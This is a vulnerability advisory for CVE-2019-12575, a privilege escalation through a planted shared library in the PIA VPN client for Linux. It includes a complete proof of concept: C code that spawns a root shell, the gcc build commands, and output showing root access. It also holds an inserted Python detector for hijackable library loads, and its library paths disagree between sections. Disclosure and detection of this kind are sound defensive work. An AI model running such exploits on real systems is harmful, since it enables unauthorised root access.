Title: PIA Linux, macOS Privilege Escalation: Shared Object Injection
Author: Rich Mirch
CVE: CVE-2019-12575
Vendor Advisory: N/A

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v82 for Linux could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.

The PIA Linux binary root_runner.64 is setuid root. This binary executes
/opt/pia/ruby/64/ruby which in turn attempts to load several libraries under
/tmp/ruby-deploy.old/lib. A local unprivileged user can create a malicious
library under this path to execute arbitrary code as the root user.
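A defender-side check for this class of bug, added here as an example and not taken from the advisory or from PIA: it scans an open()/openat() trace of the privileged process for shared-object loads under directories any local user can populate, and separately tests whether a missing path could be created by an unprivileged user. The trace lines and the encdb.so filename below are constructed for illustration, not real PIA output.

```python
import os
import re
import stat

# Directories where any local user can create files. A setuid-root process
# (here the root_runner.64 -> /opt/pia/ruby/64/ruby chain) that looks for
# shared objects below these paths is hijackable, even if the path does not
# exist yet: the attacker simply creates it.
DEFAULT_UNTRUSTED = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Matches open()/openat() lines as strace prints them, e.g.
#   openat(AT_FDCWD, "/tmp/x/a.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
OPEN_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?open(?:at)?\((?:AT_FDCWD, )?"([^"]+)"[^)]*\)'
    r"\s*=\s*(-?\d+)(?:\s+(E[A-Z]+))?")
SHARED_OBJECT_RE = re.compile(r"\.so(?:\.\d+)*$")  # libfoo.so, libfoo.so.2.4

def find_hijackable_loads(trace_lines, untrusted_prefixes=DEFAULT_UNTRUSTED):
    """Return (path, state) for each shared-object open attempt under an
    untrusted prefix. state is 'missing' when the file did not exist (the
    dangerous case, as in CVE-2019-12575) or 'present' otherwise."""
    findings = []
    for line in trace_lines:
        m = OPEN_RE.match(line.strip())
        if not m:
            continue
        path, ret, errno = m.group(1), int(m.group(2)), m.group(3)
        if not SHARED_OBJECT_RE.search(os.path.basename(path)):
            continue
        if not path.startswith(tuple(untrusted_prefixes)):
            continue
        state = "missing" if ret < 0 and errno == "ENOENT" else "present"
        findings.append((path, state))
    return findings

def attacker_can_create(path):
    """True if the deepest existing ancestor of `path` is world-writable,
    i.e. an unprivileged user could create the missing file or directory."""
    current = os.path.abspath(path)
    while not os.path.exists(current):
        current = os.path.dirname(current)
    return bool(os.stat(current).st_mode & stat.S_IWOTH)

# Constructed sample trace, shaped like `strace -f -e trace=openat` output.
SAMPLE_TRACE = [
    '[pid  4242] openat(AT_FDCWD, "/opt/pia/ruby/64/lib/libruby.so.2.4", O_RDONLY|O_CLOEXEC) = 3',
    '[pid  4242] openat(AT_FDCWD, "/tmp/ruby-deploy.old/lib/ruby/2.4.0/enc/encdb.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)',
    '[pid  4242] openat(AT_FDCWD, "/tmp/ruby-deploy.old/lib/ruby/2.4.0/version.rb", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)',
    '[pid  4242] openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3',
]

if __name__ == "__main__":
    for path, state in find_hijackable_loads(SAMPLE_TRACE):
        creatable = state == "missing" and attacker_can_create(path)
        print(f"{state:8} {path}  (creatable by local user: {creatable})")
```

On a patched install the expected result is an empty list; any 'missing' hit under /tmp is exactly the condition the advisory describes.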
CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:F
Base: 7.8
Temporal: 7.6

Test Environment

OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82

Steps to reproduce

All steps are executed as a low privileged user.

Step 1 - Create the following directory

mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc

Step 2 - Create woot.c to execute a shell when loaded

cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
void woot(){
  setreuid(0,0);
  execl("/bin/sh","/bin/sh",NULL);
}
EOF

Step 3 - Compile the malicious library

gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
  -shared \
  -Wl,-soname,encdb.so.so \
  -Wl,-init,woot \
  -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o

Step 4 - Execute root_runner.64

/opt/pia/root_runner/root_runner.64

Example

user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#

Timeline:

2018-12-16: Reported to vendor
2018-12-16: Vendor acknowledged receipt of report
2019-01-18: Vendor states a fix will be available in v83; however, this version was never released.
            The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure